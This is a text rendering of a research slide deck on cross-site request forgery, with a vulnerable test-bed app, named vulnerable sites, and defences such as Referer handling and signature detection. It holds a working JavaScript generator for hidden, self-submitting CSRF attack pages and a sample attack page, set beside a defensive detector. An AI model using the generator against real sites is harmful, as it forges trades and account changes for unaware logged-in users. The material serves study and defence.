Cross-Site Request Forgery: Optimizing Traditional and Advocating New Prevention Methods
Mark Jenne, Tatiana Alexenko
CSRF Overview
- Forces the victim's browser to send requests the user never intended, simply by visiting or interacting with a malicious website. The browser attaches the victim's session cookies to the forged request automatically, so the vulnerable site cannot distinguish it from a legitimate one.
- Called the "sleeping giant" of web security threats.
- Can force a user to transfer money, change their status on a social networking site, buy stock, or perform any other action on a vulnerable website that an attacker wants to trigger.
CSRF Overview (diagram)
Original Project Plan
- Week 2: Reading and preparation. Gain a better understanding of CSRF attack mechanisms.
- Weeks 3-4: Perform simple CSRF attacks. Develop a test bed and exploit the generated site.
- Weeks 5-7: Implement defense mechanisms. Referer checking, reconfirmation, and any others.
- Weeks 8-9: Final preparation. Finalize the project, conference paper, and presentation.
Alterations to the Plan
- Reconfirmation protection method: the reconfirmation value was to be derived from the trace path (network route) of the request. This does not work, because the trace path leads back to the user's browser either way; a legitimate request and a forged request issued by that same browser produce the same path, so the two cannot be told apart.
- CCNC conference: decided to submit the paper to CCNC instead of ACM HotNets.
- Social networking specification: had to find exploits in well-known social networks to present.
Test Bed Application
- Stock trading application.
- Registered users can buy and sell stock at prices pulled from Yahoo Finance.
- Uses an AJAX request to retrieve stock information in real time.
- Implements no CSRF protection at all, and was written without XSS flaws, so we could study CSRF in isolation (an XSS hole would let an attacker read the victim's CSRF tokens and bypass token-based defenses regardless).
Test Bed Application (figure)
Sample Attack
This attack uses Chris Shiflett's CSRF Redirector. The CSRF Redirector generates a page containing a form with all the inputs the target action expects; the form submits, without any click from the user, to the vulnerable application on the target website, and the victim's browser attaches its existing session cookies, so the application processes the request as the logged-in user.
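The generator below is an added example, not the presentation's code and not Chris Shiflett's tool. It builds the same kind of page the CSRF Redirector does (hidden inputs, self-submitting form) and generalizes it to a sequence of steps, each posting into its own hidden iframe, which is what the two-request brokerage case later in the deck needs. The host trade.example, the /trade/buy endpoint and its parameters are hypothetical.

```javascript
// Added example (not the presentation's code): a minimal "CSRF redirector"
// page generator. Every step becomes a hidden, auto-submitting POST form
// targeting its own invisible iframe, so the victim sees nothing.
// trade.example and /trade/buy are hypothetical.

function escapeHtml(s) {
  return String(s).replace(/[&<>"']/g, (c) => ({
    '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;',
  })[c]);
}

// One <input type="hidden"> per parameter. Values are escaped so that
// attacker-chosen data cannot break the generated markup.
function hiddenInputs(params) {
  return Object.entries(params)
    .map(([k, v]) => `<input type="hidden" name="${escapeHtml(k)}" value="${escapeHtml(v)}">`)
    .join('\n    ');
}

// steps: [{ target, params }, ...], submitted in order, delayMs apart.
// Some targets only act on the second request once the first has been
// processed; a fixed delay is a simplification of chaining on the iframe
// load event.
function buildCsrfPage(steps, delayMs = 1500) {
  const frames = steps.map((_, i) =>
    `<iframe name="sink${i}" style="display:none"></iframe>`).join('\n  ');
  const forms = steps.map((s, i) =>
    `<form id="f${i}" method="POST" target="sink${i}" action="${escapeHtml(s.target)}">\n    ${hiddenInputs(s.params)}\n  </form>`).join('\n  ');
  return `<!doctype html>
<html><body>
  ${frames}
  ${forms}
  <script>
    // The victim's browser attaches its cookies for the target site to each POST.
    for (var i = 0; i < ${steps.length}; i++) {
      setTimeout(function (k) { document.getElementById('f' + k).submit(); }, i * ${delayMs}, i);
    }
  </script>
</body></html>`;
}

// Constructed attack against the hypothetical stock-trading endpoint.
const ATTACK_PAGE = buildCsrfPage([
  { target: 'https://trade.example/trade/buy', params: { symbol: 'YHOO', shares: 100 } },
]);

console.log(ATTACK_PAGE);
```

Serving this page from any attacker-controlled origin is the entire attack: nothing on the target site is touched until the victim's own browser, carrying the victim's cookies, delivers the POST.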
Discovered Vulnerabilities
- Hi5.com (Yahoo's social networking website):
  - Change profile skin
  - Change status
  - Add applications
- Sharebuilder.com (ING's online stock brokerage):
  - Buy/sell shares of stock
  - Requires two requests for the attack
Referer Privacy Guard
- Firefox extension that obscures the user's browsing history by sending "garbage" requests to random URLs drawn from that history.
- Goal: lower the privacy cost of the Referer header so that more users leave it enabled, which in turn makes server-side Referer checking a workable CSRF defense.
- http://sourceforge.net/projects/refererprivacyg/
- Our extension is on SourceForge, available for download; an SVN repository is set up for developers.
CSRF Signature Detection
- Preview page content in a sandboxed manner: do not let any state-changing request leave until the content has been checked.
- Find deep links (form actions, image and iframe sources) and compare their host to the URL in the address bar.
- Allow users to whitelist trusted (page domain, target domain) pairs.
- Preview linked content such as images and iframes.
- Block forms that consist only of "hidden" inputs.
- Block self-submitting forms unless the user approves.
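The detector below is an added example, not the presentation's extension. It applies the signatures listed above to a page's HTML before any of the page's requests are allowed out: cross-site form actions, hidden-only forms, script-driven submission, and cross-site image or iframe sources, with a whitelist of approved domain pairs. Parsing is regex-based and sufficient for the constructed samples; a real extension would walk the DOM. All host names are hypothetical.

```javascript
// Added example (not the presentation's extension): CSRF signature detection
// over raw HTML. Hosts evil.example, trade.example and shop.example are
// hypothetical.

// Value of one HTML attribute from a tag's attribute string, or ''.
function attr(attrs, name) {
  const m = new RegExp(`\\b${name}\\s*=\\s*(?:"([^"]*)"|'([^']*)'|([^\\s>]+))`, 'i').exec(attrs);
  return m ? (m[1] ?? m[2] ?? m[3]) : '';
}

function hostOf(url, base) {
  try { return new URL(url, base).hostname; } catch { return ''; }
}

// whitelist: Set of "pageHost>targetHost" pairs the user has approved.
function detectCsrfSignatures(html, pageUrl, whitelist = new Set()) {
  const pageHost = hostOf(pageUrl, pageUrl);
  const findings = [];
  const selfSubmitting = /\.submit\s*\(/.test(html);
  const allowed = (h) => h === pageHost || whitelist.has(`${pageHost}>${h}`);

  let i = 0;
  for (const m of html.matchAll(/<form\b([^>]*)>([\s\S]*?)<\/form>/gi)) {
    const [, attrs, body] = m;
    const target = hostOf(attr(attrs, 'action') || pageUrl, pageUrl);
    const inputs = [...body.matchAll(/<input\b([^>]*)>/gi)]
      .map((inp) => (attr(inp[1], 'type') || 'text').toLowerCase());
    const hasButton = /<button\b/i.test(body) || inputs.includes('submit');

    // Deep link: the form posts to a host other than the one in the address bar.
    if (!allowed(target)) findings.push({ form: i, reason: 'cross-site-form', target });
    // A form made only of hidden inputs has no legitimate reason to exist.
    if (inputs.length > 0 && inputs.every((t) => t === 'hidden'))
      findings.push({ form: i, reason: 'hidden-only-form' });
    // Script submits the form; nothing for the user to click.
    if (selfSubmitting && !hasButton)
      findings.push({ form: i, reason: 'self-submitting-form' });
    i++;
  }

  // Cross-site images and iframes are GET requests the user did not choose to make.
  for (const m of html.matchAll(/<(img|iframe)\b([^>]*)>/gi)) {
    const src = attr(m[2], 'src');
    if (!src) continue;
    const target = hostOf(src, pageUrl);
    if (!allowed(target)) findings.push({ tag: m[1].toLowerCase(), reason: 'cross-site-src', target });
  }
  return findings;
}

// Constructed samples: an attack page and a harmless search form.
const ATTACK_HTML = `<html><body>
<form id="f" method="POST" action="https://trade.example/trade/buy">
  <input type="hidden" name="symbol" value="YHOO">
  <input type="hidden" name="shares" value="100">
</form>
<script>document.getElementById('f').submit();</script>
</body></html>`;

const BENIGN_HTML = `<form action="/search"><input type="text" name="q"><button>Go</button></form>`;

console.log(detectCsrfSignatures(ATTACK_HTML, 'https://evil.example/page'));
console.log(detectCsrfSignatures(BENIGN_HTML, 'https://shop.example/'));
```

Each signature on its own produces false positives (single sign-on and payment redirects use cross-site, self-submitting forms), which is why the deck pairs detection with a user-approved whitelist rather than blocking outright.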
Conclusions: CSRF can be prevented
- User: log out and clear cookies often.
- Developer:
  - Make sure the website is not vulnerable to XSS (an XSS flaw lets an attacker read the form tokens below).
  - Use form tokens, and use them wisely: unpredictable, tied to the session, and never exposed in URLs.
  - Check the Referer header: leniently for now (reject a mismatch, tolerate absence), possibly strictly once the privacy issue that makes users strip it is resolved.
Conclusions: CSRF can be detected
- While attacks are application specific, certain features are shared.
- Only a limited number of HTML tags and JavaScript functions can be used to implement and disguise an attack.
- Hidden-only and self-submitting forms have little practical use on legitimate pages.
- Whitelisting of trusted sites keeps the detection convenient for the user.
Questions